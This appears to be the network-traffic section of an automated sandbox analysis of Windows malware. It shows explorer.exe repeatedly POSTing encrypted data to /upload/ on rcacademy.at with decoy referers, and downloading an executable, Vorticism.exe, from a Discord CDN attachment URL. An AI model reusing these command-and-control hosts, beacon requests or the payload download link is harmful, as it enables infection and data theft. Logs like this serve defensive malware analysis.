                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  5192.168.2.649762218.38.155.21080C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:31:45.476506948 CET1168OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://ydnswljr.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 162
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:31:45.476528883 CET1169OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 76 24 c8 ad
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[k,vuv$$g(`]q\R*uET5xd*"0hF9&k
                                                                                                                                  Dec 18, 2021 15:31:46.648004055 CET1169INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:31:46 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  50192.168.2.649892211.59.14.9080C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:32:56.807126999 CET22412OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://xefimpb.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 119
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:32:56.807151079 CET22412OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 23 6b 2c 90 f5 76 0b 75 3a 1b d1 85
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[#k,vu:'bXu!"~R)6^1m
                                                                                                                                  Dec 18, 2021 15:32:57.694097996 CET22412INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:32:57 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  51192.168.2.649893222.232.238.24380C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:32:58.084212065 CET22413OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://dppsna.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 241
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:32:58.084919930 CET22414OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 20 6b 2c 90 f5 76 0b 75 59 01 e1 b5
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[ k,vuYYkuontVx0^7BntJ%UE9&su.KcSWl)'/^7pUpKf*LD:YmU 9&z
                                                                                                                                  Dec 18, 2021 15:32:59.244699955 CET22415INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:32:58 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  6192.168.2.649763218.38.155.21080C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:31:47.001285076 CET1170OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://vyedgkcsgg.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 349
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:31:47.001288891 CET1171OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 27 33 dc 9d
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[k,vu'3F4<ZsQ`U?Jck+'IAMvn3\_g8C)7v>:QO)VpxB9
                                                                                                                                  Dec 18, 2021 15:31:47.850507021 CET1180INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:31:47 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  7192.168.2.649765218.38.155.21080C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:31:48.190701962 CET1181OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://rydxhqucb.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 293
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:31:48.190715075 CET1182OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 3b 0f c4 98
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[k,vu;7e`7#b1%"M[ 8J`(G:)py7=z#?e/?l.4@K;~u5Zk}t}/6?0
                                                                                                                                  Dec 18, 2021 15:31:49.417517900 CET1189INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:31:48 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  8192.168.2.649767218.38.155.21080C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:31:49.743518114 CET1190OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://uwbia.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 320
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:31:49.747071028 CET1190OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 2b 2e fd 92
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[k,vu+.;UCe5s>+Al.FlfM7">I<{aOJ^!ZQUB^+M6j75]A_2#]l~Z37
                                                                                                                                  Dec 18, 2021 15:31:50.991211891 CET1191INHTTP/1.1 200 OK
                                                                                                                                  Date: Sat, 18 Dec 2021 14:31:50 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 0
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  9192.168.2.649768222.232.238.24380C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:31:51.321173906 CET1192OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://lwahbovc.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 254
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:31:51.321188927 CET1192OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 42 39 b2 a6
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[k,vuB9z_Mb#B~4S/9wG6#J!1.:.4HNNUUJAGhZcXb(bJBD0/pxk+"X\;Qm
                                                                                                                                  Dec 18, 2021 15:31:52.518672943 CET1193INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:31:51 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  0192.168.2.649796162.159.134.233443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2021-12-18 14:32:00 UTC0OUTGET /attachments/921473641538027521/921473810035793960/Vorticism.exe HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Host: cdn.discordapp.com
                                                                                                                                  2021-12-18 14:32:00 UTC0INHTTP/1.1 200 OK
                                                                                                                                  Date: Sat, 18 Dec 2021 14:32:00 GMT
                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                  Content-Length: 545280
                                                                                                                                  Connection: close
                                                                                                                                  CF-Ray: 6bf9191ad848c2db-FRA
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Age: 70518
                                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                                  Content-Disposition: attachment;%20filename=Vorticism.exe
                                                                                                                                  ETag: "f2f8a2b12cb2e41ffbe135b6ed9b5b7c"
                                                                                                                                  Expires: Sun, 18 Dec 2022 14:32:00 GMT
                                                                                                                                  Last-Modified: Fri, 17 Dec 2021 18:47:56 GMT
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                  x-goog-generation: 1639766876515048
                                                                                                                                  x-goog-hash: crc32c=ByriIg==
                                                                                                                                  x-goog-hash: md5=8viisSyy5B/74TW27ZtbfA==
                                                                                                                                  x-goog-metageneration: 1
                                                                                                                                  x-goog-storage-class: STANDARD
                                                                                                                                  x-goog-stored-content-encoding: identity
                                                                                                                                  x-goog-stored-content-length: 545280
                                                                                                                                  X-GUploader-UploadID: ADPycduCeJ_d0qkscF_t4q-qWNWKIllj8_PbmwrAq2dZF5dl8JRRXPRozgghZiblY4l8TnFdLBkYBMeRCfQkZQNs_5M
                                                                                                                                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
